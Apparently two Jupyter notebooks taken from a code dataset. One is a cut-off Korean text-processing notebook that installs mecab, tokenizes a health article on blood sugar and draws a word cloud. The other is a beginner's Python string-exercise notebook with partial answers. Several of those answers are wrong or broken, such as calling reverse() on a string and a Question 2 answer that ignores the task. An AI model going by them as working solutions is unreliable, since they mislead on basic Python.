done\nconfigure: creating ./config.status\nconfig.status: creating Makefile\n/usr/local/lib\n/sbin/ldconfig.real: /usr/local/lib/python3.7/dist-packages/ideep4py/lib/libmkldnn.so.0 is not a symbolic link\n\n/usr/local/libexec/mecab/mecab-dict-index -d . -o . -f UTF-8 -t UTF-8\nreading ./unk.def ... 13\nemitting double-array: 100% |###########################################| \nreading ./J.csv ... 416\nreading ./XPN.csv ... 83\nreading ./Symbol.csv ... 16\nreading ./CoinedWord.csv ... 148\nreading ./Hanja.csv ... 125750\nreading ./NR.csv ... 482\nreading ./Place-address.csv ... 19301\nreading ./EC.csv ... 2547\nreading ./XR.csv ... 3637\nreading ./Wikipedia.csv ... 36762\nreading ./Place.csv ... 30303\nreading ./Foreign.csv ... 11690\nreading ./XSA.csv ... 19\nreading ./VCN.csv ... 7\nreading ./IC.csv ... 1305\nreading ./ETN.csv ... 14\nreading ./NNG.csv ... 208524\nreading ./EF.csv ... 1820\nreading ./MAG.csv ... 14242\nreading ./NNBC.csv ... 677\nreading ./MAJ.csv ... 240\nreading ./ETM.csv ... 133\nreading ./XSV.csv ... 23\nreading ./NP.csv ... 342\nreading ./EP.csv ... 51\nreading ./Person-actor.csv ... 99230\nreading ./VX.csv ... 125\nreading ./VA.csv ... 2360\nreading ./VCP.csv ... 9\nreading ./NNP.csv ... 2371\nreading ./Preanalysis.csv ... 5\nreading ./Inflect.csv ... 44820\nreading ./NNB.csv ... 140\nreading ./VV.csv ... 7331\nreading ./MM.csv ... 453\nreading ./Group.csv ... 3176\nreading ./Person.csv ... 196459\nreading ./NorthKorea.csv ... 3\nreading ./Place-station.csv ... 1145\nreading ./XSN.csv ... 124\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 
3822x2693\nemitting matrix : 100% |###########################################| \n\ndone!\necho To enable dictionary, rewrite /usr/local/etc/mecabrc as \\\"dicdir = /usr/local/lib/mecab/dic/mecab-ko-dic\\\"\nTo enable dictionary, rewrite /usr/local/etc/mecabrc as \"dicdir = /usr/local/lib/mecab/dic/mecab-ko-dic\"\nmake[1]: Entering directory '/tmp/mecab-ko-dic-2.1.1-20180720'\nmake[1]: Nothing to be done for 'install-exec-am'.\n /bin/mkdir -p '/usr/local/lib/mecab/dic/mecab-ko-dic'\n /usr/bin/install -c -m 644 model.bin matrix.bin char.bin sys.dic unk.dic left-id.def right-id.def rewrite.def pos-id.def dicrc '/usr/local/lib/mecab/dic/mecab-ko-dic'\nmake[1]: Leaving directory '/tmp/mecab-ko-dic-2.1.1-20180720'\nInstall mecab-python\n/tmp /tmp/mecab-ko-dic-2.1.1-20180720\nCloning into 'mecab-python-0.996'...\nUnpacking objects: 100% (17/17), done.\n/tmp/mecab-ko-dic-2.1.1-20180720\nProcessing /tmp/mecab-python-0.996\n\u001b[33m DEPRECATION: A future pip version will change local packages to be built in-place without first copying to a temporary directory. We recommend you use --use-feature=in-tree-build to test your packages with this new behavior before it becomes the default.\n pip 21.3 will remove support for this functionality. You can find discussion regarding this at https://github.com/pypa/pip/issues/7555.\u001b[0m\nBuilding wheels for collected packages: mecab-python\n Building wheel for mecab-python (setup.py) ... 
\u001b[?25l\u001b[?25hdone\n Created wheel for mecab-python: filename=mecab_python-0.996_ko_0.9.2-cp37-cp37m-linux_x86_64.whl size=141815 sha256=718db5104ac2e7534573819fde3e104d206b4d0db4adf9b2fa576da445173d5c\n Stored in directory: /root/.cache/pip/wheels/40/7b/9f/2922869bef86c3354ae7034f7a3647c573ee1997c2dad0290a\n\u001b[33m WARNING: Built wheel for mecab-python is invalid: Metadata 1.2 mandates PEP 440 version, but '0.996-ko-0.9.2' is not\u001b[0m\nFailed to build mecab-python\nInstalling collected packages: mecab-python\n Running setup.py install for mecab-python ... \u001b[?25l\u001b[?25hdone\n\u001b[33m DEPRECATION: mecab-python was installed using the legacy 'setup.py install' method, because a wheel could not be built for it. A possible replacement is to fix the wheel build issue reported above. You can find discussion regarding this at https://github.com/pypa/pip/issues/8368.\u001b[0m\nSuccessfully installed mecab-python-0.996-ko-0.9.2\nDone.\n" ], [ "article.replace('[^가-힣ㄱ-ㅎㅠ]',' ')", "_____no_output_____" ], [ "from konlpy.tag import Mecab", "_____no_output_____" ], [ "mecab = Mecab()", "_____no_output_____" ], [ "x_train = list()\nokt = konlpy.tag.Okt()\nfor word in article:\n temp_x = okt.morphs(word, stem=True)\n words = list()\n for tok in temp_x:\n if tok not in stopwords:\n words.append(tok)\n x_train.append(words)\n\nprint(x_train)", "[['살'], [], [], ['찌'], ['고'], [], ['혈'], ['당'], [], [], ['오'], ['르'], ['늘다'], [], [], ['유'], ['늘다'], [], ['간'], ['단'], ['하'], ['다'], ['.'], [], ['많다'], [], [], ['먹다'], ['고'], [], ['움'], ['직'], [], ['지다'], [], ['않다'], ['기'], [], ['때'], ['문'], [], ['다'], ['.'], [], ['심'], ['지다'], ['어'], [], ['식'], ['사'], [], ['후'], [], ['바'], ['로'], [], ['누'], ['워'], [], [], ['늘다'], [], ['사'], ['람'], [], [], ['있다'], ['다'], ['.'], [], ['살'], ['을'], [], ['빼'], ['고'], [], ['혈'], ['당'], ['을'], [], ['관'], ['리'], ['하'], ['려'], ['면'], [], ['\"'], ['먹다'], ['었'], ['으'], ['면'], [], ['움'], ['직'], ['여'], ['라'], ['\"'], ['늘다'], [], ['말'], ['을'], 
[], ['새'], ['겨'], ['들다'], ['을'], [], ['필'], ['요'], ['가다'], [], ['있다'], ['다'], ['.'], [], ['일'], ['상'], ['생'], ['활'], [], ['서다'], [], ['혈'], ['당'], ['을'], [], ['내'], ['리'], ['고'], [], ['다'], [], ['어'], ['트'], [], [], ['좋다'], [], [], ['습'], ['관'], [], [], ['대다'], ['해'], [], ['알'], ['아'], ['보'], [], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['음'], ['식'], [], ['먹다'], ['으'], ['면'], [], ['오다'], ['라'], ['가다'], ['늘다'], [], ['혈'], ['당'], ['.'], ['.'], [], ['당'], ['뇨'], ['병'], [], ['예'], ['방'], ['-'], ['관'], ['리'], [], [], ['비'], ['상'], ['\\n'], ['\\n'], ['혈'], ['액'], [], ['속'], [], [], ['포'], ['함'], ['되다'], [], ['당'], ['('], ['포'], [], ['당'], [')'], [], [], ['농'], [], ['가다'], [], ['바'], ['로'], [], ['혈'], ['당'], [], ['다'], ['.'], [], ['음'], ['식'], ['을'], [], ['먹다'], ['으'], ['면'], [], ['포'], [], ['당'], [], [], ['만'], ['들다'], ['어'], ['지다'], ['고'], [], ['인'], ['슐'], ['린'], [], [], ['글'], ['루'], ['카'], ['곤'], [','], [], ['두'], [], ['가다'], ['지다'], [], ['물'], ['질'], [], [], [], ['해'], [], ['조'], ['절'], ['되다'], ['다'], ['.'], [], ['혈'], ['당'], [], [], ['식'], ['후'], [], [], ['오다'], ['라'], ['가다'], ['고'], [], ['공'], ['복'], [], ['상'], ['태'], ['가다'], [], ['되다'], ['면'], [], ['떨다'], ['어'], ['진'], ['다'], ['.'], [], ['많다'], [], [], ['먹다'], ['고'], [], ['자다'], [], ['움'], ['직'], [], ['질'], [], ['않다'], ['으'], ['면'], [], ['혈'], ['당'], [], ['조'], ['절'], ['을'], [], ['하'], ['늘다'], [], ['인'], ['슐'], ['린'], [], [], ['분'], ['비'], ['가다'], [], ['제'], ['대다'], ['로'], [], [], ['뤄'], ['지다'], ['지다'], [], ['않다'], ['늘다'], ['다'], ['.'], [], ['혈'], ['당'], [], [], ['높다'], ['아'], ['지다'], ['면'], [], ['당'], ['뇨'], ['병'], [], ['위'], ['허다'], [], [], ['크다'], ['진'], ['다'], ['.'], [], ['당'], ['뇨'], ['병'], [], [], ['걸'], ['리'], ['면'], [], ['완'], ['치'], ['가다'], [], ['없다'], ['다'], ['.'], [], ['평'], ['생'], [], ['관'], ['리'], ['해'], ['야'], [], [], ['다'], ['.'], [], ['심'], ['장'], ['병'], ['('], ['협'], ['심'], ['증'], [','], [], ['심'], ['근'], ['경'], ['색'], [')'], [], ['나'], [], ['뇌'], ['졸'], ['중'], ['('], ['뇌'], ['추다'], ['혈'], [','], [], 
['뇌'], ['경'], ['색'], [')'], [], ['등'], [], ['혈'], ['관'], [], ['질'], ['환'], [], ['위'], ['허다'], [], [], ['높다'], ['아'], ['진'], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['식'], ['후'], [], ['입'], ['가다'], ['심'], ['으'], ['로'], [], ['케'], [], ['크다'], ['?'], ['\\n'], ['\\n'], ['식'], ['사'], [], [], [], [], ['뒤'], [], ['케'], [], ['크다'], [], [], ['먹다'], ['늘다'], [], ['경'], ['우'], ['가다'], [], ['있다'], ['다'], ['.'], [], ['하'], ['지다'], ['만'], [], ['설'], ['탕'], [','], [], ['꿀'], [','], [], ['물'], ['엿'], [','], [], ['시'], ['럽'], [','], [], ['초'], ['콜'], ['릿'], [','], [], ['사'], ['탕'], [','], [], ['타다'], ['산'], ['음'], ['료'], [], ['등'], [], ['단'], ['순'], ['당'], [], [], ['많다'], [], [], ['함'], ['유'], ['되다'], [], ['식'], ['품'], [], [], ['혈'], ['당'], ['을'], [], ['급'], ['격'], ['하'], ['게'], [], ['오다'], ['릴'], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['대다'], [], ['당'], ['뇨'], ['병'], ['학'], ['회'], [], [], ['따다'], ['르'], ['면'], [], ['단'], ['순'], ['당'], [], [], ['농'], ['축'], ['되다'], [], ['열'], ['량'], ['원'], [], ['기'], [], ['때'], ['문'], [], [], ['소'], ['화'], ['흡'], ['수'], ['가다'], [], ['빨'], ['라'], [], ['혈'], ['당'], ['을'], [], ['급'], ['속'], ['히'], [], ['높다'], ['일'], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['아'], ['침'], [], ['공'], ['복'], [], [], ['운'], ['동'], ['을'], [], ['하'], ['다'], [], ['저'], ['혈'], ['당'], [], [], ['빠'], ['진'], [], ['당'], ['뇨'], ['병'], [], ['환'], [], ['가다'], [], ['급'], ['하'], ['게'], [], ['당'], [], [], ['들다'], [], ['음'], ['식'], ['을'], [], ['찾다'], ['늘다'], [], ['것'], [], [], ['혈'], ['당'], ['을'], [], ['빠'], ['르'], ['게'], [], ['오다'], ['려'], ['야'], [], ['하'], ['기'], [], ['때'], ['문'], [], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], [], ['일'], [], [], ['식'], ['후'], [], [], ['먹다'], ['늘다'], ['다'], ['?'], [], ['\"'], ['식'], ['전'], [], [], ['드'], ['셔'], [], ['보'], ['세'], ['요'], ['\"'], ['\\n'], ['\\n'], ['식'], ['사'], [], ['후'], [], [], [], ['일'], ['을'], [], ['먹다'], ['늘다'], [], ['것'], [], [], ['일'], ['상'], ['화'], ['되다'], ['어'], [], ['있다'], ['다'], ['.'], [], ['하'], ['지다'], ['만'], [], ['혈'], 
['당'], [], ['관'], ['리'], [], ['늘다'], [], ['좋다'], ['지다'], [], ['않다'], ['다'], ['.'], [], ['오'], ['히'], ['려'], [], ['식'], ['사'], [], ['전'], [], [], ['먹다'], ['으'], ['면'], [], [], ['식'], ['을'], [], ['막'], ['고'], [], ['혈'], ['당'], [], ['조'], ['절'], [], [], [], [], ['움'], [], [], ['되다'], ['다'], ['.'], [], ['자다'], [], ['익'], [], [], [], ['일'], [','], [], ['단'], [], ['맛'], [], [], ['강'], [], [], [], ['일'], [], [], ['당'], ['지다'], ['수'], ['가다'], [], ['높다'], ['다'], ['.'], [], ['평'], ['소'], [], ['혈'], ['당'], [], [], ['높다'], [], [], ['사'], ['람'], [], [], ['열'], ['대다'], [], ['일'], [], ['등'], [], ['단'], [], [], ['일'], ['을'], [], ['피'], ['해'], ['야'], [], [], ['다'], ['.'], [], ['건'], ['강'], [], [], ['사'], ['람'], [], ['라'], [], [], ['단'], [], [], ['일'], ['을'], [], [], ['식'], ['하'], ['지다'], [], ['않다'], ['늘다'], [], ['게'], [], ['좋다'], ['다'], ['.'], [], [], ['일'], [], [], ['많다'], [], [], ['먹다'], ['으'], ['면'], [], ['혈'], ['당'], ['을'], [], ['오다'], ['리'], ['고'], [], ['살'], [], [], ['찌다'], [], ['우'], ['려'], ['가다'], [], ['있다'], ['다'], ['.'], [], ['사'], [], ['늘다'], [], ['3'], ['분'], [], [], ['1'], ['쪽'], [','], [], ['바'], ['나'], ['나'], ['늘다'], [], ['반'], [], ['개'], [], ['정'], [], ['가다'], [], ['좋다'], ['다'], ['.'], [], ['토'], ['마'], ['토'], ['처'], ['럼'], [], ['당'], [], ['가다'], [], ['비'], ['교'], ['적'], [], ['낮'], ['고'], [], ['수'], ['분'], ['함'], ['량'], [], [], ['높다'], [], [], ['채'], ['소'], ['나'], [], [], ['일'], [], [], ['작'], [], [], ['크다'], ['기'], [], ['2'], ['개'], [], [], ['먹다'], ['어'], [], [], ['되다'], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['닭'], [], ['칼'], ['국'], ['수'], [','], [], ['콩'], ['국'], ['수'], ['가다'], [], ['혈'], ['당'], [], ['관'], ['리'], [], [], ['좋다'], [], [], [], ['유'], ['\\n'], ['\\n'], ['밥'], [','], [], ['빵'], [','], [], ['떡'], [','], [], ['국'], ['수'], [], ['같다'], [], [], ['타다'], ['수'], ['화'], ['물'], [], [], ['음'], ['식'], [], [], ['당'], ['지다'], ['수'], ['가다'], [], ['높다'], ['아'], [], ['혈'], ['당'], ['을'], [], ['빨'], ['리'], [], ['오다'], ['린'], ['다'], ['.'], [], [], ['런'], [], ['음'], 
['식'], ['들다'], [], [], ['혈'], ['당'], ['을'], [], ['천'], ['천'], ['히'], [], ['오다'], ['리'], ['늘다'], [], ['살'], ['코'], ['기'], ['('], ['쇠'], ['고'], ['기'], [','], [], ['돼다'], ['지다'], ['고'], ['기'], [','], [], ['닭'], ['고'], ['기'], [], ['등'], [')'], [','], [], ['생'], ['선'], [], ['같다'], [], [], ['단'], ['백'], ['질'], [], [], ['함'], ['께'], [], ['먹다'], ['으'], ['면'], [], ['혈'], ['당'], [], ['상'], ['승'], ['을'], [], ['느'], ['리'], ['게'], [], [], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['닭'], [], ['가다'], ['슴'], ['살'], [], [], ['들다'], [], ['칼'], ['국'], ['수'], ['나'], [], ['콩'], [], ['단'], ['백'], ['질'], [], [], ['풍'], ['부'], [], [], ['콩'], ['국'], ['수'], [], [], [], ['움'], [], [], ['되다'], ['다'], ['.'], [], ['콩'], [], [], ['포'], [], ['당'], [], ['나'], [], ['콜'], ['레'], ['스'], ['테'], ['롤'], [], [], ['흡'], ['수'], [], [], ['지다'], ['연'], ['시'], ['켜'], [], ['혈'], ['당'], [], [], ['서다'], ['서다'], ['히'], [], ['오'], ['르'], ['게'], [], [], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['식'], ['초'], ['늘다'], [], ['맛'], ['?'], [], ['\"'], ['건'], ['강'], ['효'], [], [], ['따다'], ['로'], [], ['있다'], ['어'], ['요'], ['\"'], ['\\n'], ['\\n'], ['식'], ['초'], ['늘다'], [], ['시'], ['크다'], [], [], ['맛'], [], ['뿐'], [], ['아'], ['니'], ['라'], [], ['혈'], ['당'], [], ['조'], ['절'], [], [], ['효'], [], [], [], ['내다'], ['다'], ['.'], [], ['혈'], ['당'], ['을'], [], ['천'], ['천'], ['히'], [], ['오다'], ['리'], ['기'], [], ['때'], ['문'], [], [], ['음'], ['식'], ['물'], [], [], ['넣다'], ['어'], [], ['먹다'], ['으'], ['면'], [], ['건'], ['강'], [], [], ['좋다'], ['다'], ['.'], [], ['짜다'], ['장'], ['면'], ['을'], [], ['먹다'], ['을'], [], ['때'], [], ['단'], ['무'], ['지다'], [], [], ['식'], ['초'], [], [], ['뿌'], ['리'], ['면'], [], ['혈'], ['당'], [], ['조'], ['절'], [], [], [], ['움'], [], [], ['되다'], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['늘'], [], ['밥'], [], [], ['곁'], ['들다'], [], ['늘다'], [], ['나'], ['물'], ['을'], [], ['만'], ['들다'], [], ['때'], [], [], ['식'], ['초'], [], [], ['활'], ['용'], ['해'], ['보'], [], ['.'], [], ['타다'], ['수'], ['화'], ['물'], [], [], ['많다'], [], [], ['밥'], 
[], [], ['혈'], ['당'], [], ['상'], ['승'], ['을'], [], ['주'], [], ['하'], ['늘다'], [], ['것'], ['을'], [], ['줄'], ['일'], [], ['수'], [], ['있다'], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['\"'], ['식'], ['사'], [], ['후'], [], ['몸'], ['을'], [], ['꼭'], [], ['움'], ['직'], [], ['세'], ['요'], ['\"'], ['\\n'], ['\\n'], ['운'], ['동'], [], [], ['칼'], ['로'], ['리'], [], [], ['소'], ['모'], ['시'], ['키'], ['고'], [], ['혈'], ['당'], ['을'], [], ['직'], ['접'], ['적'], ['으'], ['로'], [], ['떨다'], ['어'], ['뜨다'], ['린'], ['다'], ['.'], [], [], ['밉다'], [], ['당'], ['뇨'], ['병'], [], [], ['있다'], ['다'], ['면'], [], ['혈'], ['관'], [], ['질'], ['환'], [], ['등'], [], ['합'], ['병'], ['증'], ['을'], [], ['예'], ['방'], [], ['다'], ['.'], [], ['아'], ['침'], [], ['식'], ['사'], [], ['후'], [], ['대다'], ['중'], ['교'], ['통'], ['을'], [], [], ['용'], ['하'], ['면'], [], ['걷다'], ['기'], [','], [], ['계'], ['단'], [], ['오'], ['르'], ['기'], [], ['등'], [], ['운'], ['동'], ['을'], [], [], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['하'], ['지다'], ['만'], [], ['점'], ['심'], [','], [], ['저'], ['녁'], [], ['식'], ['사'], [], ['후'], ['가다'], [], ['문'], ['제'], ['다'], ['.'], [], ['혈'], ['당'], [], [], ['가다'], ['장'], [], ['높다'], ['아'], ['지다'], ['늘다'], [], ['시'], ['간'], [], [], ['식'], ['후'], [], ['3'], ['0'], ['분'], ['~'], ['1'], ['시'], ['간'], [], ['사'], [], ['다'], ['.'], [], ['따다'], ['라'], ['서다'], [], ['운'], ['동'], [], [], ['최'], ['적'], [], ['시'], ['기'], ['늘다'], [], ['식'], ['후'], [], ['3'], ['0'], ['분'], ['~'], ['1'], ['시'], ['간'], [], [], ['후'], ['라'], ['고'], [], [], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['직'], ['장'], ['인'], [], [], [], [], [], [], ['앉다'], ['기'], [], ['보'], ['다'], ['늘다'], [], ['가다'], ['급'], ['적'], [], ['서다'], ['서다'], [], ['업'], ['무'], [], [], ['보'], ['거'], ['나'], [], ['복'], [], [], [], ['걷다'], ['늘다'], [], ['것'], [], [], ['좋다'], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['식'], ['후'], [], ['바'], ['로'], [], ['눕다'], ['늘다'], [], ['것'], [], [], ['최'], ['악'], ['.'], ['.'], [], ['걷다'], ['기'], ['가다'], [], ['최'], ['선'], ['\\n'], ['\\n'], ['식'], ['사'], [], 
['후'], [], ['바'], ['로'], [], ['눕다'], ['늘다'], [], ['것'], [], [], ['최'], ['악'], [], ['다'], ['.'], [], ['입'], ['속'], ['으'], ['로'], [], ['신'], ['물'], [], [], ['오다'], ['라'], ['오'], ['늘다'], [], ['위'], ['식'], [], ['역'], ['류'], ['질'], ['환'], [], ['위'], ['허다'], [], [], ['높다'], ['아'], ['진'], ['다'], ['.'], [], ['걷다'], ['기'], ['가다'], [], ['가다'], ['장'], [], ['좋다'], ['지다'], ['만'], [], ['거'], ['실'], [], ['나'], [], ['방'], ['을'], [], ['어'], ['슬'], ['렁'], ['거'], ['려'], [], [], ['좋다'], ['다'], ['.'], [], ['3'], ['0'], ['분'], [], ['정'], [], [], ['몸'], ['을'], [], ['움'], ['직'], [], ['면'], [], ['혈'], ['당'], ['을'], [], ['내'], ['리'], ['고'], [], ['소'], ['화'], [], [], [], ['크다'], [], [], ['움'], [], [], ['되다'], ['다'], ['.'], [], ['당'], ['뇨'], ['병'], [], [], ['좋다'], [], [], ['운'], ['동'], [], [], ['숨'], [], [], ['조'], ['금'], [], ['찰'], [], ['정'], [], [], [], ['강'], [], ['로'], [], ['하'], ['루'], [], [], ['3'], ['0'], ['∼'], ['6'], ['0'], ['분'], [], ['가다'], ['량'], [','], [], ['일'], ['주'], ['일'], [], [], ['3'], ['~'], ['4'], ['차'], ['례'], ['늘다'], [], ['해'], ['야'], [], [], ['다'], ['.'], [], ['무'], ['리'], [], [], ['운'], ['동'], ['보'], ['다'], ['늘다'], [], ['빠'], ['르'], ['게'], [], ['걷다'], ['기'], [','], [], [], ['전'], ['거'], [], ['타'], ['기'], [], ['등'], [], [], ['좋다'], ['다'], ['.'], [], ['무'], ['엇'], ['보'], ['다'], [], ['중'], ['요'], [], [], ['것'], [], [], ['\"'], ['먹다'], ['었'], ['으'], ['면'], [], ['움'], ['직'], ['여'], ['라'], ['\"'], ['늘다'], [], ['말'], ['을'], [], ['실'], ['천'], ['하'], ['늘다'], [], ['것'], [], ['다'], ['.'], ['\\n'], ['.']]\n" ], [ "wc = WordCloud(max_font_size=200, background_color='white', font_path ='./H2PORL.TTF', max_words=20, width=800, height=800) # FONT는 인터넷에서 불러올수 있는 것으로 변경\nwc.generate(article)\n\nplt.figure(figsize=(15, 12)) # 경제 : $이나 \\ / 정치 -> 국회의사당 / 스포츠 : MLB나 NBA /\nplt.imshow(wc)\nplt.axis('off') # 축 제거\nplt.show()", "_____no_output_____" ], [ "import tensorflow as tf", "_____no_output_____" ], [ "tokenizer = 
tf.keras.preprocessing.text.Tokenizer()\ntokenizer.fit_on_texts(article)", "_____no_output_____" ], [ "tokenizer.word_index", "_____no_output_____" ], [ "knu=read.csv(\"data/KnuSentiLex-master/SentiWord_Dict.txt\")", "_____no_output_____" ], [ "url=\"https://news.naver.com/main/ranking/read.nhn?mid=etc&sid1=111&rankingType=popular_day&oid=003&aid=0008737816&date=20180802&type=1&rankingSeq=8&rankingSectionId=100\" # URL\npage <- read_html(url,encoding = \"euc-kr\") # 인코딩 확인하기 \ndoc <- page%>%html_nodes(\"#articleBodyContents\")%>%html_text()\ndoc", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "code", "markdown", "code" ]
[ [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72e29f3057a252d31e1c4b7e9a75311b2c59be6
13,788
ipynb
Jupyter Notebook
Week 1/.ipynb_checkpoints/Lesson_1_Python_Strings_Fundamentals_Assignment-checkpoint.ipynb
KingsleyNA/UESTC-Python-Walkthroughs
131f6ec1319c288688efd6259bf4036205029f4a
[ "MIT" ]
1
2021-08-16T12:32:20.000Z
2021-08-16T12:32:20.000Z
Week 1/.ipynb_checkpoints/Lesson_1_Python_Strings_Fundamentals_Assignment-checkpoint.ipynb
KingsleyNA/UESTC-Python-Walkthroughs
131f6ec1319c288688efd6259bf4036205029f4a
[ "MIT" ]
null
null
null
Week 1/.ipynb_checkpoints/Lesson_1_Python_Strings_Fundamentals_Assignment-checkpoint.ipynb
KingsleyNA/UESTC-Python-Walkthroughs
131f6ec1319c288688efd6259bf4036205029f4a
[ "MIT" ]
null
null
null
23.329949
124
0.475921
[ [ [ "# Python String Exercises to Pull ", "_____no_output_____" ], [ "#### Question 1 \nGiven a string of odd length greater than 7, return a new string made of the middle three characters of a given String", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\ninput_string = \"JhonDipPetaJhonDipPetaJhonDipPetaJhonDipPetaJhonDipPetaJhonDipPetaJhonDipPeta\" \n# expected_output: \"Dip\"\n\n# input_string = \"JaSonAy\"\n# expected_output: \"Son\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\nmid = int(len(input_string)/2)\nmid3 = input_string[mid-1 : mid+2]\n\nprint(mid3)\n\n\n", "Dip\n" ] ], [ [ "#### Question 2 \nGiven two strings, s1 and s2, create a new string by appending s2 in the middle of s1", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\n# s1 = \"Ault\"\n# s2 = \"Kelly\"\n\n# expected_output: \"AuKellylt\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\nstring1 = \"abcdefg\"\npart = string1[4:]\n\nprint(part)\n", "efg\n" ] ], [ [ "#### Question 3\nGiven two strings, s1, and s2 return a new string made of the first, middle, and last characters each input string", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\ns1 = \"AmericaAmericaAmericaAmericaAmericaAmericaAmericaAmericaAmerica\"\ns2 = \"JapanAmericaAmericaAmericaAmericaAmericaAmericaAmericaAmericaAmerica\"\n\n# expected_output: \"AJrpan\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\n\nfirst = s1[0] + s2[0]\nmid = s1[int(len(s1)/2)] + s2[int(len(s2)/2)]\nlast = s1[-1] + s2[-1]\n\nprint(first + mid + last)\n", "AJrmaa\n" ] ], [ [ "#### Question 4\nCount all digits from a given string", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\n# s1 = \"a1b2c3d4e5\"\n# s2 = \"Japan\"\n\n# expected_output: \"There are 5 digits in the string.\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\n", 
"_____no_output_____" ] ], [ [ "#### Question 5\nFind all occurrences of a given word in a given string", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\nword = \"UESTC\"\ns1 = \"UESTC is young.UESTC is in Sichuan.UESTC is fun.\"\n\n# expected_output: \"There are 3 occurences of UESTC.\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\ns1 = s1.split()\nprint(s1)\n\n\ncount = 0\n\nfor _ in s1:\n if _ == word:\n count = count + 1\n\nprint(\"There are\", count, \"Uestc(s)in the sentence\")\n\n", "['UESTC', 'is', 'young.UESTC', 'is', 'in', 'Sichuan.UESTC', 'is', 'fun.']\nThere are 1 Uestc(s)in the sentence\n" ] ], [ [ "#### Question 6\nGiven a string, find the sum of all the numbers in the string.", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\ns1 = \"1 potato, 20001 potatoes, 3 potatoes 4 5 ...\"\n# expected_output: \"The sum of the numbers in the string is 6\"\n\n# s2 = \"On the tenth day of Christmas my true love sent to me: \n# 10 Lords a Leaping, 9 Ladies Dancing, 8 Maids a Milking,\n# 7 Swans a Swimming, 6 Geese a Laying, 5 Golden Rings,\n# 4 Calling Birds, 3 French Hens, 2 Turtle Doves\n# and a Partridge in a Pear Tree.\"\n# expected_output: \"The sum of the numbers in the string is 54\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\ncount = 0\n\ns1 = s1.split()\nprint(s1)\n\nfor word in s1:\n if word.isdigit():\n count+= int(word)\ncount", "['1', 'potato,', '20001', 'potatoes,', '3', 'potatoes', '4', '5', '...']\n" ] ], [ [ "#### Question 7:\nReverse the string\nNote, do not use any special functions like \"reverse\".", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\n# s1 = \"Delali adniL\"\n# expected_output: \"Linda Delali\"\n\n#---------------------------------------\n\n\ns1 = \"My very eye may just see\"\n\ns2 = \"eye\".reverse()\n\ns2 == \"eye\"\n\n\n# Your Solution Here", "_____no_output_____" ], [ "#isdigit, isnumeric, 
isdecimal\n\nnum = \"23\"\n\nprint(num.isdigit())\nprint(num.isnumeric())\nprint(num.isdecimal())\n\nprint(type(num))", "True\nTrue\nTrue\n<class 'str'>\n" ], [ "a = \"1\"\nb = \"2\"\n\nprint(\"3\")", "3\n" ], [ "def add(x,y):\n return x+y\n\nadd(30,35)", "_____no_output_____" ], [ "brute-force\nbasic\n---\nmemoization\ndynamic programming", "_____no_output_____" ] ], [ [ "# Great Methods with Strings", "_____no_output_____" ], [ "#### capitalize()\t\nConverts the first character to upper case\n\n#### casefold()\t\nConverts string into lower case\n\n#### center()\t\nReturns a centered string\n\n#### count()\t\nReturns the number of times a specified value occurs in a string\n\n#### encode()\t\nReturns an encoded version of the string\n\n#### endswith()\t\nReturns true if the string ends with the specified value\n\n#### expandtabs()\t\nSets the tab size of the string\n\n#### find()\t\nSearches the string for a specified value and returns the position of where it was found\n\n#### format()\t\nFormats specified values in a string\n\n#### format_map()\t\nFormats specified values in a string\n\n#### index()\t\nSearches the string for a specified value and returns the position of where it was found\n\n#### isalnum()\t\nReturns True if all characters in the string are alphanumeric\n\n#### isalpha()\t\nReturns True if all characters in the string are in the alphabet\n\n#### isdecimal()\t\nReturns True if all characters in the string are decimals\n\n#### isdigit()\t\nReturns True if all characters in the string are digits\n\n#### isidentifier()\t\nReturns True if the string is an identifier\n\n#### islower()\t\nReturns True if all characters in the string are lower case\n\n#### isnumeric()\t\nReturns True if all characters in the string are numeric\n\n#### isprintable()\t\nReturns True if all characters in the string are printable\n\n#### isspace()\t\nReturns True if all characters in the string are whitespaces\n\n#### istitle()\t\nReturns True if the string follows the 
rules of a title\n\n#### isupper()\t\nReturns True if all characters in the string are upper case\n\n#### join()\t\nJoins the elements of an iterable to the end of the string\n\n#### ljust()\t\nReturns a left justified version of the string\n\n#### lower()\t\nConverts a string into lower case\n\n#### lstrip()\t\nReturns a left trim version of the string", "_____no_output_____" ], [ "#### maketrans()\t\nReturns a translation table to be used in translations\n\n#### partition()\t\nReturns a tuple where the string is parted into three parts\n\n#### replace()\t\nReturns a string where a specified value is replaced with a specified value\n\n#### rfind()\t\nSearches the string for a specified value and returns the last position of where it was found\n\n#### rindex()\t\nSearches the string for a specified value and returns the last position of where it was found\n\n#### rjust()\t\nReturns a right justified version of the string\n\n#### rpartition()\t\nReturns a tuple where the string is parted into three parts\n\n#### rsplit()\t\nSplits the string at the specified separator, and returns a list\n\n#### rstrip()\t\nReturns a right trim version of the string\n\n#### split()\t\nSplits the string at the specified separator, and returns a list\n\n#### splitlines()\t\nSplits the 